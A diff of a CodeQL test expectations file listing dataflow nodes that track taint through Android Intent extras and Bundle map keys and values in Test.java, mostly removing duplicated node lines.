| | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | semmle.label | getIntent_extras(...) : Bundle [] : IntentSender | | Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | out : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | out : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:97:16:97:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:97:24:97:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:98:10:98:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:98:10:98:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | | Test.java:98:31:98:32 | in : Intent | semmle.label | in : Intent | | Test.java:99:9:99:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | semmle.label | getIntent_extras(...) : Bundle [] : Intent | | Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | semmle.label | out : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:99:38:99:40 | out : Intent [android.content.Intent.extras, ] : Intent | semmle.label | out : Intent [android.content.Intent.extras, ] : Intent | | Test.java:104:16:104:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:104:24:104:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) 
: Intent [android.content.Intent.extras, ] : Object | | Test.java:104:45:104:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | 
@@ -2810,21 +2147,17 @@ nodes | Test.java:244:16:244:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:244:24:244:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:245:4:245:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:245:4:245:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:245:38:245:39 | in : String | semmle.label | in : String | | Test.java:246:9:246:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:251:19:251:37 | (...)... : ArrayList | semmle.label | (...)... : ArrayList | | Test.java:251:30:251:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:252:4:252:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:252:4:252:6 | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:252:44:252:45 | in : ArrayList | semmle.label | in : ArrayList | | Test.java:253:9:253:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:253:21:253:41 | getIntent_extras(...) 
: Bundle [] : ArrayList | semmle.label | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | out : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:258:16:258:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:258:24:258:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:259:10:259:11 | in : Intent | semmle.label | in : Intent | 
@@ -2948,435 +2281,339 @@ nodes | Test.java:426:16:426:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:426:24:426:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:427:4:427:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:427:4:427:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:427:17:427:18 | in : String | semmle.label | in : String | | Test.java:428:9:428:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:433:16:433:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:433:24:433:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:434:4:434:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:434:4:434:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:434:17:434:18 | in : String | semmle.label | in : String | | Test.java:435:9:435:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:440:16:440:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:440:24:440:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:441:4:441:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:441:4:441:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:441:17:441:18 | in : String | semmle.label | in : String | | Test.java:442:9:442:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:447:16:447:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:447:24:447:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:448:4:448:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:448:4:448:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:448:17:448:18 | in : String | semmle.label | in : String | | Test.java:449:9:449:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:454:16:454:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:454:24:454:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:455:4:455:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:455:4:455:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:455:17:455:18 | in : String | semmle.label | in : String | | Test.java:456:9:456:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:456:19:456:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:461:16:461:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:461:24:461:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:462:4:462:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:462:4:462:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:462:17:462:18 | in : String | semmle.label | in : String | | Test.java:463:9:463:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:463:19:463:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:468:16:468:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:468:24:468:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:469:4:469:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:469:4:469:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:469:17:469:18 | in : String | semmle.label | in : String | | Test.java:470:9:470:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:470:19:470:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:475:16:475:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:475:24:475:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:476:4:476:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:476:4:476:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:476:17:476:18 | in : String | semmle.label | in : String | | Test.java:477:9:477:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:477:19:477:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:482:16:482:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:482:24:482:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:483:4:483:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:483:4:483:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:483:17:483:18 | in : String | semmle.label | in : String | | Test.java:484:9:484:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:484:19:484:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:489:16:489:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:489:24:489:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:490:4:490:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:490:4:490:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:490:17:490:18 | in : String | semmle.label | in : String | | Test.java:491:9:491:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:491:19:491:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:496:16:496:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:496:24:496:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:497:4:497:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:497:4:497:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:497:17:497:18 | in : String | semmle.label | in : String | | Test.java:498:9:498:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:498:19:498:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:503:16:503:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:503:24:503:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:504:4:504:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:504:4:504:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:504:17:504:18 | in : String | semmle.label | in : String | | Test.java:505:9:505:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:505:19:505:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:510:16:510:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:510:24:510:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:511:4:511:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:511:4:511:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:511:17:511:18 | in : String | semmle.label | in : String | | Test.java:512:9:512:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:512:19:512:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:517:16:517:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:517:24:517:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:518:4:518:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:518:4:518:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:518:17:518:18 | in : String | semmle.label | in : String | | Test.java:519:9:519:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:519:19:519:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:524:16:524:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:524:24:524:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:525:4:525:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:525:4:525:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:525:17:525:18 | in : String | semmle.label | in : String | | Test.java:526:9:526:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:526:19:526:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:531:16:531:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:531:24:531:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:532:4:532:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:532:4:532:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:532:17:532:18 | in : String | semmle.label | in : String | | Test.java:533:9:533:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:533:19:533:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:538:16:538:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:538:24:538:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:539:4:539:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:539:4:539:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:539:17:539:18 | in : String | semmle.label | in : String | | Test.java:540:9:540:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:540:19:540:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:545:16:545:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:545:24:545:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:546:4:546:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:546:4:546:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:546:17:546:18 | in : String | semmle.label | in : String | | Test.java:547:9:547:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:547:19:547:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:552:16:552:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:552:24:552:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:553:4:553:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:553:4:553:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:553:17:553:18 | in : String | semmle.label | in : String | | Test.java:554:9:554:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:554:19:554:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:559:16:559:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:559:24:559:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:560:4:560:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:560:4:560:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:560:17:560:18 | in : String | semmle.label | in : String | | Test.java:561:9:561:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:561:19:561:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:566:16:566:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:566:24:566:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:567:4:567:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:567:4:567:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:567:17:567:18 | in : String | semmle.label | in : String | | Test.java:568:9:568:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:568:19:568:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:573:16:573:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:573:24:573:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:574:4:574:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:574:4:574:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:574:17:574:18 | in : String | semmle.label | in : String | | Test.java:575:9:575:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:575:19:575:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:580:16:580:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:580:24:580:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:581:4:581:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:581:4:581:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:581:17:581:18 | in : String | semmle.label | in : String | | Test.java:582:9:582:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:582:19:582:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) 
: Bundle [] : String | | Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:587:16:587:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:587:24:587:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:588:4:588:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:588:4:588:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:588:17:588:18 | in : String | semmle.label | in : String | | Test.java:589:9:589:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:589:19:589:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:594:17:594:33 | (...)... : short[] | semmle.label | (...)... : short[] | | Test.java:594:26:594:33 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:595:4:595:6 | out [post update] : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:595:4:595:6 | out [post update] : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : short[] | | Test.java:595:31:595:32 | in : short[] | semmle.label | in : short[] | | Test.java:596:9:596:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:596:21:596:41 | getIntent_extras(...) : Bundle [] : short[] | semmle.label | getIntent_extras(...) : Bundle [] : short[] | | Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | semmle.label | out : Intent [android.content.Intent.extras, ] : short[] | | Test.java:601:15:601:29 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:601:22:601:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:602:4:602:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:602:4:602:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:602:31:602:32 | in : Number | semmle.label | in : Number | | Test.java:603:9:603:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:603:21:603:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) 
